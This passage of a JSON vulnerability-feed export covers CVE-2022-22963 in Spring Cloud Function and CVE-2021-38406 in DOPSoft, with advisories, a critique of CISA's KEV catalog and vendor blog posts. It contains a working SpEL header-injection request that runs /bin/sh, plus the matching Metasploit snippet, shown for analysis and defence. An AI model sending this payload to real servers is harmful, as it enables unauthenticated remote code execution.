execute an OS command through the Java Runtime. The following example echos to the `/tmp/success` file. It differs from the original by using an array of strings for the arguments passed to `exec`. 
Because the header value is an SpEL query, single quotes should be [escaped by doubling them](<https://docs.spring.io/spring-cloud-dataflow/docs/1.2.3.RELEASE/reference/html/shell-white-space.html#CO10-2>).\n \n \n POST /functionRouter HTTP/1.1\n Host: 192.168.159.128:8080\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69\n spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','echo \"hello world\" >> /tmp/msf-success'})\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 0\n \n\nOn successful exploitation, the server responds with a 500 error and a JSON response.\n \n \n HTTP/1.1 500 Internal Server Error\n Content-Type: application/json\n Content-Length: 153\n \n {\"timestamp\":\"2022-03-30T20:41:28.551+00:00\",\"path\":\"/functionRouter\",\"status\":500,\"error\":\"Internal Server Error\",\"message\":\"\",\"requestId\":\"8fed4100-1\"}\n \n\nThe response from a server that was patched for the vulnerability (versions 3.1.7 and 3.2.3) is identical.\n\nThe vulnerability was patched on March, 29th, 2022 in commit [bcb2a25a](<https://github.com/spring-cloud/spring-cloud-function/commit/bcb2a25a28f3d026b35a795abe18d14f9cdb3022>). The patch adds a [second evaluation context](<https://github.com/spring-cloud/spring-cloud-function/blob/bcb2a25a28f3d026b35a795abe18d14f9cdb3022/spring-cloud-function-context/src/main/java/org/springframework/cloud/function/context/config/RoutingFunction.java#L64>) and uses it when the SpEL query [originates](<https://github.com/spring-cloud/spring-cloud-function/blob/bcb2a25a28f3d026b35a795abe18d14f9cdb3022/spring-cloud-function-context/src/main/java/org/springframework/cloud/function/context/config/RoutingFunction.java#L202>) from the HTTP request header. 
The [SimpleEvaluationContext](<https://docs.spring.io/spring-framework/docs/5.0.6.RELEASE/javadoc-api/org/springframework/expression/spel/support/SimpleEvaluationContext.html>) is used when the query originates from a header.\n\n> SimpleEvaluationContext is tailored to support only a subset of the SpEL language syntax, e.g. excluding references to Java types, constructors, and bean references.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T00:00:00", "type": "attackerkb", "title": "CVE-2022-22963", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-01T00:00:00", "id": "AKB:5BDFACBD-4722-492A-AAA8-EBCC3C6403C4", "href": "https://attackerkb.com/topics/1RIGeNMYFk/cve-2022-22963", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T20:21:01", "description": "Delta Electronic DOPSoft 2 (Version 2.00.07 and prior) lacks proper validation of user-supplied data when parsing specific project files. 
This could result in multiple out-of-bounds write instances. An attacker could leverage this vulnerability to execute code in the context of the current process.\n\n \n**Recent assessments:** \n \n**jbaines-r7** at September 02, 2022 10:47am UTC reported:\n\nEdit: At 4:43pm EST on September 2, 2022, Director of CISA Jen Easterly responded to this entry via [tweet](<https://twitter.com/CISAJen/status/1565802511440777218?s=20&t=jGGMFllNltUdukyQ5ph7EA>). We appreciate the update and look forward to more improvements in the future.\n\n# CVE-2021-38406 Shouldn\u2019t Be on the CISA KEV List\n\nOn August 25, 2022, CISA added [CVE-2021-38406](<https://nvd.nist.gov/vuln/detail/CVE-2021-38406>) to their Known Exploited Vulnerabilities (KEV) Catalog. This was a significant addition to KEV because CVE-2021-38406 affects [Delta Industrial Automation\u2019s](<https://www.deltaww.com/en-us/products/Industrial-Automation/ALL/>) [DOPSoft](<https://filecenter.deltaww.com/Products/download/06/060302/Manual/DELTA_IA-HMI_DOPSoft_UM_EN_20211230.pdf>) software. This addition to the KEV catalog is almost certainly a mistake, which we\u2019ll discuss below in great detail. Technically, they might have included this CVE on purpose, but that would mean that CISA just low-key dropped some huge news about the next Stuxnet, which is unlikely to the point of unbelievability. But, you decide!\n\n\n\n## What\u2019s DOPSoft and CVE-2021-38406?\n\nDOPSoft is [HMI](<https://en.wikipedia.org/wiki/User_interface>) programming software. An attacker that exploits DOPSoft can potentially find themselves on an [engineering workstation](<https://collaborate.mitre.org/attackics/index.php/Engineering_Workstation>) within the ICS network _and_ with specialized programming access to local HMI. That\u2019s a very critical and dangerous place for any attacker to be.\n\nCVE-2021-38406 reportedly affects DOPSoft\u2019s parsing of project files. 
That\u2019s notable because, despite vulnerabilities affecting all sorts of ICS project files, there have been very few publicly disclosed examples of [project file infections](<https://attack.mitre.org/techniques/T0873/>) used in the wild. The only examples we\u2019re aware of are [Stuxnet](<https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf>) (Step7 project files) and [AutoCAD/AutoLISP project file](<https://ics-cert.kaspersky.com/media/Kaspersky-ICS-engineering-and-integration-sector-2020-En.pdf>) malware. With this KEV entry, CISA has disclosed a unique and ICS-specific attack being exploited in the wild.\n\nOf course, that\u2019s if you only look at the surface level information that CISA provides. The reality is that this CVE doesn\u2019t affect DOPSoft project files, and there is evidence that suggests the CVE was added to the catalog in error. Let\u2019s dive deeper.\n\n## The CVE Description is Bad\n\nCISA includes the CVE\u2019s description in their KEV entry. The description for CVE-2021-38406 follows:\n\n> Delta Electronic DOPSoft 2 (Version 2.00.07 and prior) lacks proper validation of user-supplied data when parsing specific project files. This could result in multiple out-of-bounds write instances. An attacker could leverage this vulnerability to execute code in the context of the current process.\n\nICS-CERT is the credited CNA and therefore the likely culprit for this misleading description. The vulnerability was actually discovered by the prolific vulnerability researcher, kimiya, and disclosed through the [Zero Day Initiative](<https://www.zerodayinitiative.com/>) (ZDI). The vulnerability description provided by ZDI for [CVE-2021-38406](<https://www.zerodayinitiative.com/advisories/ZDI-21-952/>) is much more specific.\n\n> This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Industrial Automation DOPSoft. 
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n> \n> The specific flaw exists within the parsing of XLS files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.\n\nHere we can see that ZDI says the vulnerability affects `xls` files. Notably, `xls` files _are not_ DOPSoft project files. `xls` is a Microsoft Excel format. Use of the [Microsoft XLS file format](<https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/cd03cb5f-ca02-4934-a391-bb674cb8aa06>) is only associated with one feature of DOPSoft, and that\u2019s multi-language support. The software can support multiple language texts on any given widget. For example, this DOPSoft screenshot shows a text block that can present as \u201chello world!\u201d in English, Spanish, or German.\n\n\n\nDOPSoft allows the programmer to export the multi-language data as an `xls` file, presumably, so language specialists can review/edit the content, and then the programmer can import updated versions of the text. This is all done through the `Edit` drop-down menu when a project is already loaded.\n\n\n\nWhen the data is exported, it looks exactly how you\u2019d expect:\n\n\n\nAccording to ZDI, the vulnerability is exploitable when a new multi-language `xls` is imported. Which means, getting back to the topic at hand, DOPSoft project files are not affected as ICS-CERT indicated. The `xls` file is **not** a project file (e.g. it doesn\u2019t control logic on an HMI, nor can it be used to launch DOPSoft). DOPSoft project files use the `dps`, `dpb`, or `dop` extension.\n\nThe only way the `xls` could be considered a project file is if the `Import Multi-Language Text` functionality embedded the `xls` in a DOPSoft project file. 
That would be a little strange, but not inconceivable (it\u2019s ICS software after all). So we decided to pull apart the DOPSoft project file format in order to find an embedded `xls`.\n\n## File Format Exploration\n\nIt\u2019s important to know if the `xls` is contained within DOPSoft project files, not just to nit-pick ICS-CERT, but to determine how many clicks are required to exploit a victim. The affected software is end-of-life and hasn\u2019t been patched for CVE-2021-38406, so understanding the full attack is important when discussing remediation guidance. If the `xls` file is contained within a project file then double clicking on the project will trigger the `xls` parsing and exploit the victim. If the `xls` is only parsed during `Import Multi-Language Text` then an attacker has to get a victim to launch DOPSoft, load a project, and then import the malicious `xls`. Both scenarios are obviously doable, but the second is more involved (and therefore less likely).\n\nThe DOPSoft `dps` project file is split into two parts. By default, the first part is essentially empty (a bitmap filled with `0xfc`). The second part contains gzip compressed data.\n\n\n\nThe compressed data explodes into a large binary blob of unknown format with a short ASCII preamble (\u201cDelta-HMI Screen Editor DOP V1010\u201d).\n\n\n\nWe spent some time in `windbg` figuring out what this unknown format is. Turns out, the file is xor encoded after the first 42 bytes. 
So we trim the project file:\n \n \n tail -c +42 B8B6 > B8B6.xor\n \n\nAnd run the following Python script to deobfuscate it:\n \n \n f = open('B8B6.xor', \"rb\")\n g = open('B8B6.deobfs', \"w\")\n \n try:\n while True:\n byte = f.read(1)\n if byte == '' or len(byte) == 0:\n break\n xbyte = chr(ord(byte) ^ 0x64)\n g.write(xbyte)\n finally:\n f.close()\n \n g.close()\n \n\nAnd the result is a very large `ini` file.\n \n \n [Application]\n Version=4.00.07.04\n DefaultScreen=1\n DefaultMemFmt=2\n PanelSeries=DOP-B series\n PanelName=DOP-B10E615 65536 Colors\n PanelRotate=0\n ModelName=-1106222768\n WarpText=1\n ShowAfterReadDataFlag=0\n StopUpload=0\n SpeedupPageChange=0\n StartupDelayTime=0\n Name=HMI\n OptimizeType=2\n CommInt=0\n IntRetry=3\n ControllerSection0=Delta\n ControllerName0=Delta DVP PLC\n HMIStationNr0=0\n DefPLCStationNr0=1\n CommName0=Link2\n PortNr0=2\n Interface0=0\n databits0=7\n stopbits0=1\n baud0=9600\n \u2026 truncated \u2026\n \n\nMost importantly, we find that the ini file contains **no** `xls` data. Instead, the multi-language data is represented as normal ini entries. Below you can see our three `hello worlds!`:\n \n \n [State]\n Value=0\n FgColor=16579836\n BgColor=11842740\n FontColor=0\n FontSize0=12\n FontRatio0=100\n FontName0=Arial\n wTextLen0=26\n h\\00e\\00l\\00l\\00o\\00 \\00w\\00o\\00r\\00l\\00d\\00!\\00\\00\\00\n FontSize1=12\n FontRatio1=100\n FontName1=Arial Greek\n wTextLen1=24\n h\\00o\\00l\\00a\\00 \\00m\\00u\\00\\00\\00\\00\\00o\\00!\\00\\00\\00\n FontSize2=12\n FontRatio2=100\n FontName2=Calibri\n wTextLen2=24\n h\\00a\\00l\\00l\\00o\\00 \\00w\\00e\\00l\\00t\\00!\\00\\00\\00\n FontAlign=33\n FontBold=0\n FontItalic=0\n \n\nWhich means, we don\u2019t think ICS-CERT\u2019s description is correct. The project file does not contain an `xls` file, so it will never trigger CVE-2021-38406. An attacker is required to trick the victim into loading the malicious `xls` via the `Import Multi-Language Text` feature. 
Users should be able to continue safely using DOPSoft affected by CVE-2021-38406, as long as they avoid using the multi-language import feature.\n\n## Ok. Fine. But Was It Exploited in the Wild?!\n\nExploitation might be complicated in a real world scenario. But it\u2019s still doable. The conditions are actually ideal.\n\n\n\nThe question, \u201cDoes CVE-2021-38406 belong in the KEV catalog?\u201d remains relevant even if the CVE description is bad.\n\nCISA calls the KEV catalog _the authoritative source of vulnerabilities that have been exploited in the wild_. However, CISA never provides any justification for the items they add, or don\u2019t add, to the catalog. Entries are simply added and that\u2019s that. But anyone that has been involved with the entry adding process knows that CISA largely relies on open source reporting from the security industry in order to populate the catalog. They\u2019ve chosen to never credit or even cite their sources, opting instead to represent the work as their own, for reasons we won\u2019t speculate on here.\n\nRegardless, the lack of citation/proof makes challenging any entry on the list almost impossible. Each KEV entry requires action by federal civilian executive branch agencies due to the [Binding Operation Directive 22-01](<https://www.cisa.gov/binding-operational-directive-22-01>). Each erroneous entry wastes time, resources, and taxpayer money, not just in the federal space but the myriad security companies that have been, more or less, forced to support the KEV catalog in their products. Not to mention the potential reputational harm an incorrect entry might cause. The fact that CISA provides no evidence and provides no obvious avenues for dissent is problematic.\n\nWhich brings us back to the subject at hand. CVE-2021-38406 was added to the KEV catalog along with 9 other vulnerabilities on August 25, 2022. 
Three of the newly added vulnerabilities, CVE-2022-22963 (Spring Cloud), CVE-2022-24112 (Apache APISIX), and CVE-2021-39226 (Grafana), were included in an August 19, 2022 article by Unit 42 called, _[Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More](<https://unit42.paloaltonetworks.com/recent-exploits-network-security-trends/>)_. The article details exploits seen in the wild. Additionally, Unit 42 **accidentally** tagged the article with the DOPSoft CVE, CVE-2021-38406.\n\n\n\nWe know this inclusion was accidental because Unit 42 does not discuss the vulnerability, even in passing, at any point in the article. Also, their data collection method, pictured below, would not be able to detect exploitation of CVE-2021-38406 because it\u2019s a local exploit requiring (fairly significant) user interaction.\n\n\n\nThe IPS _might_ see a malformed `xls` file over network traffic, but that isn\u2019t quite the same as seeing an actual exploitation attempt.\n\nAnd, finally, we know CVE-2021-38406 was accidentally tagged in that article because we were told so:\n\n\n\n## Conclusion\n\nThere is no other open source information indicating that CVE-2021-38406 has been exploited in the wild. Could it be that CISA knows this vulnerability, which requires significant user interaction to exploit niche ICS software, was exploited in the wild? 
Or is it more likely that CISA was lifting CVEs from Unit 42\u2019s blog and erroneously included CVE-2021-38406 because it was mistakenly included in the article?\n\nFinally, this research demonstrates that we clearly need _some_ kind of mechanism to challenge weird-looking updates to the KEV list to avoid burning a lot of time, effort, money, and heartache on chasing vulnerabilities that many, many people _must_ chase because they\u2019re subject to [BOD-22-1](<https://www.cisa.gov/binding-operational-directive-22-01>).\n\n_edit: Title changed as per request at 4:22pm EST on Sept. 2, 2022_\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2Assessed Attacker Value: 1\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-09T00:00:00", "type": "attackerkb", "title": "CVE-2021-38406", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38406", "CVE-2021-39226", "CVE-2022-22963", "CVE-2022-24112"], "modified": "2021-10-05T00:00:00", "id": "AKB:2B7B662B-EDD1-4BFA-978A-6AE63790F8A5", "href": "https://attackerkb.com/topics/RHuGSieFJe/cve-2021-38406", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "akamaiblog": [{"lastseen": "2022-04-01T15:27:32", "description": "Although Spring Cloud Functions are not as widespread as the Log4j library, and should provide a good separation from the hosting server, some draw the line between the two, due to the ease of exploitation over HTTP/s. This new vulnerability will definitely result in many threat actors launching campaigns for crypto-mining, ddos, ransomware, and as a golden ticket to break into organizations for the next years to come.", "cvss3": {}, "published": "2022-03-31T19:30:00", "type": "akamaiblog", "title": "Spring Cloud Function SpEL Injection (CVE-2022-22963) Exploited in the Wild", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T19:30:00", "id": "AKAMAIBLOG:8B6AA3E3035869AEAE3021AB3F1EFE32", "href": "https://www.akamai.com/blog/security/spring-cloud-function", "cvss": {"score": 0.0, "vector": "NONE"}}], "veracode": [{"lastseen": "2023-04-18T05:56:21", "description": "spring-cloud-function-context is vulnerable to remote code execution. 
The routing functionality allows a user to provide a malicious SpEL as a routing-expression which would allow arbitrary OS commands to be executed remotely.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T01:51:42", "type": "veracode", "title": "Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-07-25T21:02:40", "id": "VERACODE:34884", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-34884/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2022-04-07T13:29:14", "description": "\n\nWe have completed remediating the instances of Spring4Shell (CVE-2022-22965) and Spring Cloud (CVE-2022-22963) vulnerabilities that we found on our internet-facing services and systems. We continue to monitor for new vulnerability instances and to remediate vulnerabilities on internally accessible services. We also continue to monitor our environment for anomalous activity, having found none so far. 
No action is required by our customers at this time.\n\n## Further reading and recommendations\n\nOur Emergent Threat Response team has put together a [detailed blog post](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) with general guidance about how to mitigate and remediate Spring4Shell. We will continue updating that post as we learn more about Spring4Shell and new remediation and mitigation approaches.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T14:42:42", "type": "rapid7blog", "title": "Update on Spring4Shell\u2019s Impact on Rapid7 Solutions and Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T14:42:42", "id": "RAPID7BLOG:46F0D57262DABE81708D657F2733AA5D", "href": "https://blog.rapid7.com/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2022-04-06T16:15:25", "description": "## CVE-2022-22963 - Spring Cloud Function SpEL RCE\n\n\n\nA new `exploit/multi/http/spring_cloud_function_spel_injection` module has been developed by our very own [Spencer McIntyre](<https://github.com/smcintyre-r7>) which targets Spring Cloud Function versions Prior to 3.1.7 and 3.2.3. This module is unrelated to [Spring4Shell CVE-2022-22965](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>), which is a separate vulnerability in the WebDataBinder component of Spring Framework.\n\nThis exploit works by crafting an unauthenticated HTTP request to the target application. When the `spring.cloud.function.routing-expression` HTTP header is received by the server it will evaluate the user provided SpEL (Spring Expression Language) query, leading to remote code execution. This can be seen within the [CVE-2022-22963 Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/16395/files#diff-85438aef360f2d47359f2cb9d7f9f52465f8bc23f2d9b6fa04fc4fef6eef69dbR109-R111>):\n \n \n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI']),\n 'headers' => {\n 'spring.cloud.function.routing-expression' => \"T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub(\"'\", \"''\")}'})\"\n }\n )\n \n\nBoth patched and unpatched servers will respond with a 500 server error and a JSON encoded message\n\n## New module content (1)\n\n * [Spring Cloud Function SpEL Injection](<https://github.com/rapid7/metasploit-framework/pull/16395>) by Spencer McIntyre, hktalent, and m09u3r, which exploits [CVE-2022-22963](<https://attackerkb.com/topics/1RIGeNMYFk/cve-2022-22963?referrer=blog>) \\- This achieves unauthenticated remote code execution by executing SpEL (Spring Expression Language) queries against Spring Cloud Function versions prior to `3.1.7` and `3.2.3`.\n\n## Bugs fixed (2)\n\n * 
[#16364](<https://github.com/rapid7/metasploit-framework/pull/16364>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds a fix for a crash in `auxiliary/spoof/dns/native_spoofer` and adds documentation for the module.\n * [#16386](<https://github.com/rapid7/metasploit-framework/pull/16386>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a crash when running the `exploit/multi/misc/java_rmi_server` module against at target server, such as Metasploitable2\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.35...6.1.36](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-03-24T13%3A07%3A34-04%3A00..2022-03-31T11%3A00%3A06-05%3A00%22>)\n * [Full diff 6.1.35...6.1.36](<https://github.com/rapid7/metasploit-framework/compare/6.1.35...6.1.36>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T18:34:29", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T18:34:29", "id": "RAPID7BLOG:F708A09CA1EFFC0565CA94D5DBC414D5", "href": "https://blog.rapid7.com/2022/04/01/metasploit-weekly-wrap-up-155/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-02T17:56:13", "description": "\n\nThe Vulnerability Management team kicked off Q2 by [remediating](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) the instances of [Spring4Shell](<https://docs.rapid7.com/insightvm/spring4shell/>) (CVE-2022-22965) and Spring Cloud (CVE-2022-22963) vulnerabilities 
that impacted cybersecurity teams worldwide. We also made several investments to both [InsightVM](<https://www.rapid7.com/products/insightvm/>) and [Nexpose](<https://www.rapid7.com/products/nexpose/>) throughout the second quarter that will help improve and better automate vulnerability management for your organization. Let\u2019s dive in!\n\n## [InsightVM] New dashboard cards based on CVSS v3 Severity \n\nCVSS (Common Vulnerability Scoring System) is an open standard for scoring the severity of vulnerabilities; it\u2019s a key metric that organizations use to prioritize risk in their environments. To empower organizations with tools to do this more effectively, we recently duplicated seven CVSS dashboard cards in InsightVM to include a version that sorts the vulnerabilities based on CVSS v3 scores.The v3 CVSS system made some changes to both quantitative and qualitative scores. For example, [Log4Shell](<https://www.rapid7.com/log4j-cve-2021-44228-customer-resources/>) had a score of 9.3 (high) in v2 and a 10 (critical) in v3. \n\n**Having both V2 and V3 version dashboards available allows you to prioritize and sort vulnerabilities according to your chosen methodology.** Security is not one-size-fits all, and the CVSS v2 scoring might provide more accurate vulnerability prioritization for some customers. InsightVM allows customers to choose whether v2 or v3 scoring is a better option for their organizations\u2019 unique needs. \n\nThe seven cards now available for CVSS v3 are:\n\n * Exploitable Vulnerabilities by CVSS Score\n * Exploitable Vulnerability Discovery Date by CVSS Score\n * Exploitable Vulnerability Publish Age by CVSS Score\n * Vulnerability Count By CVSS Score Over Time\n * Vulnerabilities by CVSS Score\n * Vulnerability Discovery Date by CVSS Score\n * Vulnerability Publish Age by CVSS Score\n\n\n## [InsightVM] Asset correlation for Citrix VDI instances\n\nYou asked, and we listened. 
By popular demand, InsightVM can now identify agent-based assets that are Citrix VDI instances and correlate them to the user, enabling more accurate asset/instance tagging.\n\nPreviously, when a user started a non-persistent VDI, it created a new AgentID, which then created a new asset in the console and consumed a user license. The InsightVM team is excited to bring this solution to our customers for this widely persistent problem. \n\nThrough the Improved Agent experience for Citrix VDI instances, when User X logs into their daily virtual desktop, it will automatically correlate to User\u2019s experience, maintain the asset history, and consume only one license. **The result is a smoother, more streamlined experience for organizations that deploy and scan Citrix VDI.**\n\n## [Nexpose and InsightVM] Scan Assistant made even easier to manage\n\nIn December 2021, we launched Scan Assistant, a lightweight service deployed on an asset that uses digital certificates for handshake instead of account-based credentials; This alleviates the credential management headaches VM teams often encounter. The Scan Assistant is also designed to drive improved vulnerability scanning performance in both InsightVM and Nexpose, with faster completion times for both vulnerability and policy scans. \n\nWe recently released Scan Assistant 1.1.0, which automates Scan Assistant software updates and digital certificate rotation for customers seeking to deploy and maintain a fleet of Scan Assistants. This new automation improves security \u2013 digital certificates are more difficult to compromise than credentials \u2013 and simplifies administration for organizations by enabling them to centrally manage features from the Security Console.\n\nCurrently, these enhancements are only available on Windows OS. 
To opt into automated Scan Assistant software updates and/or digital certificate rotation, please visit the Scan Assistant tab in the Scan Template.\n\n\n\n\n\n## [[Nexpose](<https://docs.rapid7.com/nexpose/recurring-vulnerability-coverage/>) and [InsightVM](<https://docs.rapid7.com/insightvm/recurring-vulnerability-coverage/>)] Recurring coverage \n\nRapid7 is committed to providing ongoing monitoring and coverage for a number of software products and services. The Vulnerability Management team continuously evaluates items to add to our recurring coverage list, basing selections on threat and security advisories, overall industry adoption, and customer requests. \n\nWe recently added several notable software products/services to our list of recurring coverage, including:\n\n * **AlmaLinux and Rocky Linux.** These free Linux operating systems have grown in popularity among Rapid7 Vulnerability Management customers seeking a replacement for CentOS. Adding recurring coverage for both AlmaLinux and Rocky Linux enables customers to more safely make the switch and maintain visibility into their vulnerability risk profile.\n * **Oracle E-Business Suite.** ERP systems contain organizations\u2019 \u201ccrown jewels\u201d \u2013 like customer data, financial information, strategic plans, and other proprietary data \u2013 so it\u2019s no surprise that attacks on these systems have [increased ](<https://www.mckinsey.com/business-functions/mckinsey-digital/our-insights/seven-steps-to-help-protect-your-erp-system-against-cyberattacks>)in recent years. Our new recurring coverage for the Oracle E-Business Suite is one of the most complex pieces of recurring coverage added to our list, providing coverage for several different components to ensure ongoing protection for Oracle E-Business Suite customers\u2019 most valuable information.\n * **VMware Horizon. **The VMware Horizon platform enables the delivery of virtual desktops and applications across a number of operating systems. 
